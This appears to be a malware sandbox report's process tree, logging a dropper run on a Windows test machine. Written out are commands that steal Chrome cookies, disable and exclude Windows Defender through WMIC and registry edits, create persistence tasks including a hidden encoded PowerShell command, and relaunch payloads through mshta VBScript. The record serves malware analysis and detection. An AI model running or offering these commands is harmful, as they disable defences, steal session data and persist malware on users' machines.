C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
C:\Users\Admin\Pictures\Adobe Films\qlpBohVlctP4xo42L4x3FADp.exe"C:\Users\Admin\Pictures\Adobe Films\qlpBohVlctP4xo42L4x3FADp.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ffbbc3b4f50,0x7ffbbc3b4f60,0x7ffbbc3b4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,3718708811859927853,9727164909377278396,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2004 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1504,3718708811859927853,9727164909377278396,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1516 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1504,3718708811859927853,9727164909377278396,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:88⤵
-
C:\Users\Admin\Pictures\Adobe Films\9uwaPt_tqcep97TSyZbfNjM3.exe"C:\Users\Admin\Pictures\Adobe Films\9uwaPt_tqcep97TSyZbfNjM3.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\p8U3yKF0venTvli81op8W0eF.exe"C:\Users\Admin\Pictures\Adobe Films\p8U3yKF0venTvli81op8W0eF.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\0z3UTKfMl9KRdVHqwJeiwhfl.exe"C:\Users\Admin\Pictures\Adobe Films\0z3UTKfMl9KRdVHqwJeiwhfl.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\kL91RoQGJJN5nR_OsLL_P4D4.exe"C:\Users\Admin\Pictures\Adobe Films\kL91RoQGJJN5nR_OsLL_P4D4.exe"6⤵
-
C:\Users\Admin\AppData\Local\2dfd9d2a-ece6-40aa-8a60-f72e918e3860.exe"C:\Users\Admin\AppData\Local\2dfd9d2a-ece6-40aa-8a60-f72e918e3860.exe"7⤵
-
C:\Users\Admin\AppData\Local\4b34bf28-987c-4326-8c97-75a063b46b0d.exe"C:\Users\Admin\AppData\Local\4b34bf28-987c-4326-8c97-75a063b46b0d.exe"7⤵
-
C:\Users\Admin\AppData\Local\9d716af9-2c19-493e-93f8-dc3a87b172ca.exe"C:\Users\Admin\AppData\Local\9d716af9-2c19-493e-93f8-dc3a87b172ca.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\go-memexec-099644427.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-099644427.exe8⤵
-
C:\Users\Admin\AppData\Local\af9dffab-3cff-449e-87c1-6e8d07975418.exe"C:\Users\Admin\AppData\Local\af9dffab-3cff-449e-87c1-6e8d07975418.exe"7⤵
-
C:\Users\Admin\AppData\Local\a22e984e-47fb-4f5f-b3d8-702f262a4442.exe"C:\Users\Admin\AppData\Local\a22e984e-47fb-4f5f-b3d8-702f262a4442.exe"7⤵
-
C:\Users\Admin\AppData\Local\cca9fb1a-8a1d-4bd8-bea1-247acd57fb67.exe"C:\Users\Admin\AppData\Local\cca9fb1a-8a1d-4bd8-bea1-247acd57fb67.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-978QH.tmp\v7AaS6F5IxTu_AeYaOO8oKQi.tmp"C:\Users\Admin\AppData\Local\Temp\is-978QH.tmp\v7AaS6F5IxTu_AeYaOO8oKQi.tmp" /SL5="$404BA,140559,56832,C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8VFQO.tmp\Bouderbela.exe"C:\Users\Admin\AppData\Local\Temp\is-8VFQO.tmp\Bouderbela.exe" /S /UID=27108⤵
-
C:\Users\Admin\Pictures\Adobe Films\SoNzwFF6TlzSJ8YfhwnUz4dh.exe"C:\Users\Admin\Pictures\Adobe Films\SoNzwFF6TlzSJ8YfhwnUz4dh.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0JRHI.tmp\SoNzwFF6TlzSJ8YfhwnUz4dh.tmp"C:\Users\Admin\AppData\Local\Temp\is-0JRHI.tmp\SoNzwFF6TlzSJ8YfhwnUz4dh.tmp" /SL5="$8027C,140559,56832,C:\Users\Admin\Pictures\Adobe Films\SoNzwFF6TlzSJ8YfhwnUz4dh.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M09N5.tmp\Bouderbela.exe"C:\Users\Admin\AppData\Local\Temp\is-M09N5.tmp\Bouderbela.exe" /S /UID=27098⤵
-
C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe" -u7⤵
-
C:\Users\Admin\Pictures\Adobe Films\gY_HQ6gd5lVeO7V1Jo5M_IwW.exe"C:\Users\Admin\Pictures\Adobe Films\gY_HQ6gd5lVeO7V1Jo5M_IwW.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 6527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 6247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 6527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\QFISIYMHX3VLXtiXolSbu2Vs.exe"C:\Users\Admin\Pictures\Adobe Films\QFISIYMHX3VLXtiXolSbu2Vs.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\ihlwSWD29ZYM9Qj25qETN1LX.exe"C:\Users\Admin\Pictures\Adobe Films\ihlwSWD29ZYM9Qj25qETN1LX.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\ihlwSWD29ZYM9Qj25qETN1LX.exe"C:\Users\Admin\Pictures\Adobe Films\ihlwSWD29ZYM9Qj25qETN1LX.exe" -u7⤵
-
C:\Users\Admin\Pictures\Adobe Films\yfNhCDYc1mB2Ycm44QkRUks1.exe"C:\Users\Admin\Pictures\Adobe Films\yfNhCDYc1mB2Ycm44QkRUks1.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3874.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3F2B.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Users\Admin\Pictures\Adobe Films\Bm6T0AQasDOe2XNGKw9xtdA6.exe"C:\Users\Admin\Pictures\Adobe Films\Bm6T0AQasDOe2XNGKw9xtdA6.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\fF4lYaRqAulMcCkN8YdmeqaH.exe"C:\Users\Admin\Pictures\Adobe Films\fF4lYaRqAulMcCkN8YdmeqaH.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\oifPI4DViPHgtkfwJiuaLW66.exe"C:\Users\Admin\Pictures\Adobe Films\oifPI4DViPHgtkfwJiuaLW66.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\jkM50aNsrdTMXsfjyVP9GF8V.exe"C:\Users\Admin\Pictures\Adobe Films\jkM50aNsrdTMXsfjyVP9GF8V.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xxH2pbtqmVAaHhPSM3WZFxnI.exe"C:\Users\Admin\Pictures\Adobe Films\xxH2pbtqmVAaHhPSM3WZFxnI.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\EViMVS3ROe_PfIicCbfH7Az2.exe"C:\Users\Admin\Pictures\Adobe Films\EViMVS3ROe_PfIicCbfH7Az2.exe"6⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\is-FVL6C.tmp\EViMVS3ROe_PfIicCbfH7Az2.tmp"C:\Users\Admin\AppData\Local\Temp\is-FVL6C.tmp\EViMVS3ROe_PfIicCbfH7Az2.tmp" /SL5="$30652,140559,56832,C:\Users\Admin\Pictures\Adobe Films\EViMVS3ROe_PfIicCbfH7Az2.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\naCEAQQ78XGInMNc4JjtiIwz.exe"C:\Users\Admin\Pictures\Adobe Films\naCEAQQ78XGInMNc4JjtiIwz.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\PPO1rHXXyLyU31xL9FBx7WXi.exe"C:\Users\Admin\Pictures\Adobe Films\PPO1rHXXyLyU31xL9FBx7WXi.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\YvAkuAUNMNHh5SFjUdIEhAHu.exe"C:\Users\Admin\Pictures\Adobe Films\YvAkuAUNMNHh5SFjUdIEhAHu.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\lw2fxqqn4Gte1LsU1bINeCnY.exe"C:\Users\Admin\Pictures\Adobe Films\lw2fxqqn4Gte1LsU1bINeCnY.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZAVImFjQgfxSvBAxGGjlVyn4.exe"C:\Users\Admin\Pictures\Adobe Films\ZAVImFjQgfxSvBAxGGjlVyn4.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon063f9b9fcd31ec09.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS439B2E89\Mon063f9b9fcd31ec09.exeMon063f9b9fcd31ec09.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5jyIXmpsYlxSEOOiYglYcSsQ.exe"C:\Users\Admin\Pictures\Adobe Films\5jyIXmpsYlxSEOOiYglYcSsQ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\uTTRL1xi10y7Ce7tE4v_jDQn.exe"C:\Users\Admin\Pictures\Adobe Films\uTTRL1xi10y7Ce7tE4v_jDQn.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\uTTRL1xi10y7Ce7tE4v_jDQn.exe"C:\Users\Admin\Pictures\Adobe Films\uTTRL1xi10y7Ce7tE4v_jDQn.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\p4af1RqyGlJkS7TDvwXu4Z5k.exe"C:\Users\Admin\Pictures\Adobe Films\p4af1RqyGlJkS7TDvwXu4Z5k.exe"6⤵
-
C:\Users\Admin\Documents\dKvphV0dizQPAhHdVAtGAEA6.exe"C:\Users\Admin\Documents\dKvphV0dizQPAhHdVAtGAEA6.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\gY_HQ6gd5lVeO7V1Jo5M_IwW.exe"C:\Users\Admin\Pictures\Adobe Films\gY_HQ6gd5lVeO7V1Jo5M_IwW.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 2407⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 6847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 6647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 8967⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 11487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 11607⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gY_HQ6gd5lVeO7V1Jo5M_IwW.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\gY_HQ6gd5lVeO7V1Jo5M_IwW.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gY_HQ6gd5lVeO7V1Jo5M_IwW.exe" /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\EABZDxqScC0nz3ML5LgeLosX.exe"C:\Users\Admin\Pictures\Adobe Films\EABZDxqScC0nz3ML5LgeLosX.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xxH2pbtqmVAaHhPSM3WZFxnI.exe"C:\Users\Admin\Pictures\Adobe Films\xxH2pbtqmVAaHhPSM3WZFxnI.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\qlpBohVlctP4xo42L4x3FADp.exe"C:\Users\Admin\Pictures\Adobe Films\qlpBohVlctP4xo42L4x3FADp.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )7⤵
-
C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe"C:\Users\Admin\Pictures\Adobe Films\XmNWQ_GEqobREP0uByvvqj9U.exe" -u7⤵
-
C:\Users\Admin\Pictures\Adobe Films\jggqAH5aPlMVCqrbYFHeOvx2.exe"C:\Users\Admin\Pictures\Adobe Films\jggqAH5aPlMVCqrbYFHeOvx2.exe"6⤵
-
C:\Users\Admin\AppData\Local\ae1a7c36-a14e-4b0a-a902-f204275e4a83.exe"C:\Users\Admin\AppData\Local\ae1a7c36-a14e-4b0a-a902-f204275e4a83.exe"7⤵
-
C:\Users\Admin\AppData\Local\b4b3d8ec-1bc9-4290-b2e9-bf14c7a1a33d.exe"C:\Users\Admin\AppData\Local\b4b3d8ec-1bc9-4290-b2e9-bf14c7a1a33d.exe"7⤵
-
C:\Users\Admin\AppData\Local\61c2be4c-43bd-421c-93b3-ebee76aa6008.exe"C:\Users\Admin\AppData\Local\61c2be4c-43bd-421c-93b3-ebee76aa6008.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\go-memexec-066775859.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-066775859.exe8⤵
-
C:\Users\Admin\AppData\Local\c90e5f5d-2e6f-44f7-bfb4-16dd77b5ce84.exe"C:\Users\Admin\AppData\Local\c90e5f5d-2e6f-44f7-bfb4-16dd77b5ce84.exe"7⤵
-
C:\Users\Admin\AppData\Local\1b25c823-b52e-4a92-b6dc-5ddddec5c557.exe"C:\Users\Admin\AppData\Local\1b25c823-b52e-4a92-b6dc-5ddddec5c557.exe"7⤵
-
C:\Users\Admin\AppData\Local\a915a9f5-5090-49dc-bb20-2c7032a18349.exe"C:\Users\Admin\AppData\Local\a915a9f5-5090-49dc-bb20-2c7032a18349.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\p8U3yKF0venTvli81op8W0eF.exe"C:\Users\Admin\Pictures\Adobe Films\p8U3yKF0venTvli81op8W0eF.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QED03.tmp\v7AaS6F5IxTu_AeYaOO8oKQi.tmp"C:\Users\Admin\AppData\Local\Temp\is-QED03.tmp\v7AaS6F5IxTu_AeYaOO8oKQi.tmp" /SL5="$604B8,140559,56832,C:\Users\Admin\Pictures\Adobe Films\v7AaS6F5IxTu_AeYaOO8oKQi.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AS3KG.tmp\Bouderbela.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3KG.tmp\Bouderbela.exe" /S /UID=27108⤵
-
C:\Users\Admin\Pictures\Adobe Films\fF4lYaRqAulMcCkN8YdmeqaH.exe"C:\Users\Admin\Pictures\Adobe Films\fF4lYaRqAulMcCkN8YdmeqaH.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\lilin.exe"C:\Users\Admin\AppData\Local\Temp\lilin.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Proxypub.exe"C:\Users\Admin\AppData\Local\Temp\Proxypub.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Newboxstudio.exe"C:\Users\Admin\AppData\Local\Temp\Newboxstudio.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\QFISIYMHX3VLXtiXolSbu2Vs.exe"C:\Users\Admin\Pictures\Adobe Films\QFISIYMHX3VLXtiXolSbu2Vs.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\UWrNrKR7Mf9va\Roads License Agreement.exe"C:\Users\Admin\AppData\Local\Temp\UWrNrKR7Mf9va\Roads License Agreement.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\yfNhCDYc1mB2Ycm44QkRUks1.exe"C:\Users\Admin\Pictures\Adobe Films\yfNhCDYc1mB2Ycm44QkRUks1.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA8E.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS176F.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBVuqZcTy" /SC once /ST 06:01:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\kL91RoQGJJN5nR_OsLL_P4D4.exe"C:\Users\Admin\Pictures\Adobe Films\kL91RoQGJJN5nR_OsLL_P4D4.exe"6⤵
-
C:\Users\Admin\AppData\Local\f978c39d-7258-44f9-b0e4-2f71ac80a520.exe"C:\Users\Admin\AppData\Local\f978c39d-7258-44f9-b0e4-2f71ac80a520.exe"7⤵
-
